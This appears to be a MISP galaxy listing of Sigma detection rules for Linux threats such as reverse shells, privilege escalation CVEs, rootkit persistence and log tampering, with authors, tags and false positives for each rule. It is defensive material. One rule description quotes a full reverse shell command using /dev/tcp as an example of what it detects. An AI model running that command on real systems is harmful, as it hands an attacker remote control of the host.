author Ömer Günal, oscd.community, Pawel Mazur
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename lnx_auditd_password_policy_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1201']
Related clusters

To see the related clusters, click here.

System Information Discovery - Auditd

Detects System Information Discovery commands

Internal MISP references

UUID f34047d9-20d3-4e8b-8672-0a35cc50dc71 which can be used as unique global reference for System Information Discovery - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/03
falsepositive ['Likely']
filename lnx_auditd_system_info_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Overwriting the File with Dev Zero or Null

Detects overwriting (effectively wiping/deleting) of a file.

Internal MISP references

UUID 37222991-11e9-4b6d-8bdf-60fbe48f753e which can be used as unique global reference for Overwriting the File with Dev Zero or Null in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/10/23
falsepositive ['Appending null bytes to files.', 'Legitimate overwrite of files.']
filename lnx_auditd_dd_delete_file.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Linux Keylogging with Pam.d

Detect attempt to enable auditing of TTY input

Internal MISP references

UUID 49aae26c-450e-448b-911d-b3c13d178dfc which can be used as unique global reference for Linux Keylogging with Pam.d in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/05/24
falsepositive ['Administrative work']
filename lnx_auditd_keylogging_with_pam_d.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1003', 'attack.t1056.001']
Related clusters

To see the related clusters, click here.

Suspicious Commands Linux

Detects relevant commands often related to malware or hacking activity

Internal MISP references

UUID 1543ae20-cbdf-4ec1-8d12-7664d667a825 which can be used as unique global reference for Suspicious Commands Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/12/12
falsepositive ['Admin activity']
filename lnx_auditd_susp_cmds.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Hidden Files and Directories

Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character

Internal MISP references

UUID d08722cd-3d09-449a-80b4-83ea2d9d4616 which can be used as unique global reference for Hidden Files and Directories in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/06
falsepositive ['Unknown']
filename lnx_auditd_hidden_files_directories.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Creation Of An User Account

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

Internal MISP references

UUID 759d0d51-bc99-4b5e-9add-8f5b2c8e7512 which can be used as unique global reference for Creation Of An User Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Marie Euler, Pawel Mazur
creation_date 2020/05/18
falsepositive ['Admin activity']
filename lnx_auditd_create_account.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1136.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Suspicious Use of /dev/tcp

Detects suspicious command with /dev/tcp

Internal MISP references

UUID 6cc5fceb-9a71-4c23-aeeb-963abe0b279c which can be used as unique global reference for Suspicious Use of /dev/tcp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename lnx_susp_dev_tcp.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.reconnaissance']

Shellshock Expression

Detects shellshock expressions in log files

Internal MISP references

UUID c67e0c98-4d39-46ee-8f6b-437ebf6b950e which can be used as unique global reference for Shellshock Expression in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/14
falsepositive ['Unknown']
filename lnx_shellshock.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Remote File Copy

Detects the use of tools that copy files from or to remote systems

Internal MISP references

UUID 7a14080d-a048-4de8-ae58-604ce58a795b which can be used as unique global reference for Remote File Copy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/18
falsepositive ['Legitimate administration activities']
filename lnx_file_copy.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.command_and_control', 'attack.lateral_movement', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

Internal MISP references

UUID 41e5c73d-9983-4b69-bd03-e13b67e9623c which can be used as unique global reference for Equation Group Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/04/09
falsepositive ['Unknown']
filename lnx_apt_equationgroup_lnx.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.g0020', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd

Internal MISP references

UUID c67fc22a-0be5-4b4f-aad5-2b32c4b69523 which can be used as unique global reference for Symlink Etc Passwd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/05
falsepositive ['Unknown']
filename lnx_symlink_etc_passwd.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1204.001', 'attack.execution']
Related clusters

To see the related clusters, click here.

Potential Suspicious BPF Activity - Linux

Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.

Internal MISP references

UUID 0fadd880-6af3-4610-b1e5-008dc3a11b8a which can be used as unique global reference for Potential Suspicious BPF Activity - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Red Canary (idea), Nasreddine Bencherchali
creation_date 2023/01/25
falsepositive ['Unknown']
filename lnx_potential_susp_ebpf_activity.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.defense_evasion']

Commands to Clear or Remove the Syslog - Builtin

Detects specific commands commonly used to remove or empty the syslog

Internal MISP references

UUID e09eb557-96d2-4de9-ba2d-30f712a5afd3 which can be used as unique global reference for Commands to Clear or Remove the Syslog - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/09/10
falsepositive ['Log rotation']
filename lnx_clear_syslog.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Buffer Overflow Attempts

Detects buffer overflow attempts in Unix system log files

Internal MISP references

UUID 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781 which can be used as unique global reference for Buffer Overflow Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/01
falsepositive ['Unknown']
filename lnx_buffer_overflows.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1068', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Suspicious Reverse Shell Command Line

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell

Internal MISP references

UUID 738d9bcf-6999-4fdb-b4ac-3033037db8ab which can be used as unique global reference for Suspicious Reverse Shell Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/04/02
falsepositive ['Unknown']
filename lnx_shell_susp_rev_shells.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Suspicious Log Entries

Detects suspicious log entries in Linux log files

Internal MISP references

UUID f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 which can be used as unique global reference for Suspicious Log Entries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/25
falsepositive ['Unknown']
filename lnx_shell_susp_log_entries.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.impact']

Privileged User Has Been Created

Detects the addition of a new user to a privileged group such as "root" or "sudo"

Internal MISP references

UUID 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e which can be used as unique global reference for Privileged User Has Been Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/12/21
falsepositive ['Administrative activity']
filename lnx_privileged_user_creation.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Nimbuspwn Exploitation

Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)

Internal MISP references

UUID 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8 which can be used as unique global reference for Nimbuspwn Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/05/04
falsepositive ['Unknown']
filename lnx_nimbuspwn_privilege_escalation_exploit.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

JexBoss Command Sequence

Detects suspicious command sequence that JexBoss

Internal MISP references

UUID 8ec2c8b4-557a-4121-b87c-5dfb3a602fae which can be used as unique global reference for JexBoss Command Sequence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/24
falsepositive ['Unknown']
filename lnx_susp_jexboss.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Space After Filename

Detects space after filename

Internal MISP references

UUID 879c3015-c88b-4782-93d7-07adf92dbcb7 which can be used as unique global reference for Space After Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/17
falsepositive ['Typos']
filename lnx_space_after_filename_.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.execution']

Code Injection by ld.so Preload

Detects the ld.so preload persistence file. See man ld.so for more information.

Internal MISP references

UUID 7e3c4651-c347-40c4-b1d4-d48590fdf684 which can be used as unique global reference for Code Injection by ld.so Preload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/05
falsepositive ['Rare temporary workaround for library misconfiguration']
filename lnx_ldso_preload_injection.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1574.006']
Related clusters

To see the related clusters, click here.

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

Internal MISP references

UUID 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 which can be used as unique global reference for Suspicious Activity in Shell Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/21
falsepositive ['Unknown']
filename lnx_shell_susp_commands.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Linux Command History Tampering

Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".

Internal MISP references

UUID fdc88d25-96fb-4b7c-9633-c0e417fdbd4e which can be used as unique global reference for Linux Command History Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick Bareiss
creation_date 2019/03/24
falsepositive ['Unknown']
filename lnx_shell_clear_cmd_history.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Guacamole Two Users Sharing Session Anomaly

Detects suspicious session with two users present

Internal MISP references

UUID 1edd77db-0669-4fef-9598-165bda82826d which can be used as unique global reference for Guacamole Two Users Sharing Session Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Unknown']
filename lnx_guacamole_susp_guacamole.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

Suspicious VSFTPD Error Messages

Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

Internal MISP references

UUID 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe which can be used as unique global reference for Suspicious VSFTPD Error Messages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/05
falsepositive ['Unknown']
filename lnx_vsftpd_susp_error_messages.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Relevant ClamAV Message

Detects relevant ClamAV messages

Internal MISP references

UUID 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb which can be used as unique global reference for Relevant ClamAV Message in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/01
falsepositive ['Unknown']
filename lnx_clamav_relevant_message.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.resource_development', 'attack.t1588.001']
Related clusters

To see the related clusters, click here.

Modifying Crontab

Detects suspicious modification of crontab file.

Internal MISP references

UUID af202fd3-7bff-4212-a25a-fb34606cfcbe which can be used as unique global reference for Modifying Crontab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/04/16
falsepositive ['Legitimate modification of crontab']
filename lnx_cron_crontab_file_modification.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

PwnKit Local Privilege Escalation

Detects potential PwnKit exploitation CVE-2021-4034 in auth logs

Internal MISP references

UUID 0506a799-698b-43b4-85a1-ac4c84c720e9 which can be used as unique global reference for PwnKit Local Privilege Escalation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2022/01/26
falsepositive ['Unknown']
filename lnx_auth_pwnkit_local_privilege_escalation.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548.001']
Related clusters

To see the related clusters, click here.

SSHD Error Message CVE-2018-15473

Detects exploitation attempt using public exploit code for CVE-2018-15473

Internal MISP references

UUID 4c9d903d-4939-4094-ade0-3cb748f4d7da which can be used as unique global reference for SSHD Error Message CVE-2018-15473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/08/24
falsepositive ['Unknown']
filename lnx_sshd_ssh_cve_2018_15473.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1589']
Related clusters

To see the related clusters, click here.

Suspicious OpenSSH Daemon Error

Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

Internal MISP references

UUID e76b413a-83d0-4b94-8e4c-85db4a5b8bdc which can be used as unique global reference for Suspicious OpenSSH Daemon Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/06/30
falsepositive ['Unknown']
filename lnx_sshd_susp_ssh.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Sudo Privilege Escalation CVE-2019-14287 - Builtin

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

Internal MISP references

UUID 7fcc54cb-f27d-4684-84b7-436af096f858 which can be used as unique global reference for Sudo Privilege Escalation CVE-2019-14287 - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/15
falsepositive ['Unlikely']
filename lnx_sudo_cve_2019_14287_user.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068', 'attack.t1548.003', 'cve.2019.14287']
Related clusters

To see the related clusters, click here.

Suspicious Named Error

Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts

Internal MISP references

UUID c8e35e96-19ce-4f16-aeb6-fd5588dc5365 which can be used as unique global reference for Suspicious Named Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/02/20
falsepositive ['Unknown']
filename lnx_syslog_susp_named.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Disabling Security Tools - Builtin

Detects disabling security tools

Internal MISP references

UUID 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 which can be used as unique global reference for Disabling Security Tools - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename lnx_syslog_security_tools_disabling_syslog.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Persistence Via Cron Files

Detects creation of cron file or files in Cron directories which could indicates potential persistence.

Internal MISP references

UUID 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 which can be used as unique global reference for Persistence Via Cron Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Any legitimate cron file.']
filename file_event_lnx_persistence_cron_files.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Wget Creating Files in Tmp Directory

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

Internal MISP references

UUID 35a05c60-9012-49b6-a11f-6bab741c9f74 which can be used as unique global reference for Wget Creating Files in Tmp Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate downloads of files in the tmp folder.']
filename file_event_lnx_wget_download_file_in_tmp_dir.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Shell Script Creation in Profile Folder

Detects the creation of shell scripts under the "profile.d" path.

Internal MISP references

UUID 13f08f54-e705-4498-91fd-cce9d9cee9f1 which can be used as unique global reference for Potentially Suspicious Shell Script Creation in Profile Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.', 'Regular file creation during system update or software installation by the package manager']
filename file_event_lnx_susp_shell_script_under_profile_directory.yml
level low
logsource.category file_event
logsource.product linux
tags ['attack.persistence']

Persistence Via Sudoers Files

Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.

Internal MISP references

UUID ddb26b76-4447-4807-871f-1b035b2bfa5d which can be used as unique global reference for Persistence Via Sudoers Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Creation of legitimate files in sudoers.d folder part of administrator work']
filename file_event_lnx_persistence_sudoers_files.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Triple Cross eBPF Rootkit Default LockFile

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

Internal MISP references

UUID c0239255-822c-4630-b7f1-35362bcb8f44 which can be used as unique global reference for Triple Cross eBPF Rootkit Default LockFile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename file_event_lnx_triple_cross_rootkit_lock_file.yml
level high
logsource.category file_event
logsource.product linux
tags ['attack.defense_evasion']

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method

Internal MISP references

UUID 1a2ea919-d11d-4d1e-8535-06cda13be20f which can be used as unique global reference for Triple Cross eBPF Rootkit Default Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename file_event_lnx_triple_cross_rootkit_persistence.yml
level high
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Linux Doas Conf File Creation

Detects the creation of doas.conf file in linux host platform.

Internal MISP references

UUID 00eee2a5-fdb0-4746-a21d-e43fbdea5681 which can be used as unique global reference for Linux Doas Conf File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Teoderick Contreras
creation_date 2022/01/20
falsepositive ['Unlikely']
filename file_event_lnx_doas_conf_creation.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

Internal MISP references

UUID 19bf6fdb-7721-4f3d-867f-53467f6a5db6 which can be used as unique global reference for Communication To Ngrok Tunneling Service - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/03
falsepositive ['Legitimate use of ngrok']
filename net_connection_lnx_ngrok_tunnel.yml
level high
logsource.category network_connection
logsource.product linux
tags ['attack.exfiltration', 'attack.command_and_control', 'attack.t1567', 'attack.t1568.002', 'attack.t1572', 'attack.t1090', 'attack.t1102', 'attack.s0508']
Related clusters

To see the related clusters, click here.

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Internal MISP references

UUID 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 which can be used as unique global reference for Linux Reverse Shell Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/16
falsepositive ['Unknown']
filename net_connection_lnx_back_connect_shell_dev.yml
level critical
logsource.category network_connection
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

Internal MISP references

UUID a46c93b7-55ed-4d27-a41b-c259456c4746 which can be used as unique global reference for Linux Crypto Mining Pool Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners']
filename net_connection_lnx_crypto_mining_indicators.yml
level high
logsource.category network_connection
logsource.product linux
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Sudo Privilege Escalation CVE-2019-14287

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

Internal MISP references

UUID f74107df-b6c6-4e80-bf00-4170b658162b which can be used as unique global reference for Sudo Privilege Escalation CVE-2019-14287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/15
falsepositive ['Unlikely']
filename proc_creation_lnx_sudo_cve_2019_14287.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068', 'attack.t1548.003', 'cve.2019.14287']
Related clusters

To see the related clusters, click here.

Decode Base64 Encoded Text

Detects usage of base64 utility to decode arbitrary base64-encoded text

Internal MISP references

UUID e2072cab-8c9a-459b-b63c-40ae79e27031 which can be used as unique global reference for Decode Base64 Encoded Text in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_base64_decode.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Nohup Execution

Detects execution of binaries located in potentially suspicious locations via "nohup"

Internal MISP references

UUID 457df417-8b9d-4912-85f3-9dbda39c3645 which can be used as unique global reference for Suspicious Nohup Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_nohup_susp_execution.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Linux Remote System Discovery

Detects the enumeration of other remote systems.

Internal MISP references

UUID 11063ec2-de63-4153-935e-b1a8b9e616f1 which can be used as unique global reference for Linux Remote System Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/22
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_remote_system_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Disabling Security Tools

Detects disabling security tools

Internal MISP references

UUID e3a8a052-111f-4606-9aee-f28ebeb76776 which can be used as unique global reference for Disabling Security Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_security_tools_disabling.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Triple Cross eBPF Rootkit Execve Hijack

Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges

Internal MISP references

UUID 0326c3c8-7803-4a0f-8c5c-368f747f7c3e which can be used as unique global reference for Triple Cross eBPF Rootkit Execve Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Vim GTFOBin Abuse - Linux

Detects usage of "vim" and it's siblings as a GTFOBin to execute and proxy command and binary execution

Internal MISP references

UUID 7ab8f73a-fcff-428b-84aa-6a5ff7877dea which can be used as unique global reference for Vim GTFOBin Abuse - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_gtfobin_vim.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Execution Of Script Located In Potentially Suspicious Directory

Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

Internal MISP references

UUID 30bcce26-51c5-49f2-99c8-7b59e3af36c7 which can be used as unique global reference for Execution Of Script Located In Potentially Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Interactive Bash Suspicious Children

Detects suspicious interactive bash as a parent to rather uncommon child processes

Internal MISP references

UUID ea3ecad2-db86-4a89-ad0b-132a10d2db55 which can be used as unique global reference for Interactive Bash Suspicious Children in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/14
falsepositive ['Legitimate software that uses these patterns']
filename proc_creation_lnx_susp_interactive_bash.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.004', 'attack.t1036']
Related clusters

To see the related clusters, click here.

File and Directory Discovery - Linux

Detects usage of system utilities to discover files and directories

Internal MISP references

UUID d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 which can be used as unique global reference for File and Directory Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_file_and_directory_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

OS Architecture Discovery Via Grep

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

Internal MISP references

UUID d27ab432-2199-483f-a297-03633c05bae6 which can be used as unique global reference for OS Architecture Discovery Via Grep in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
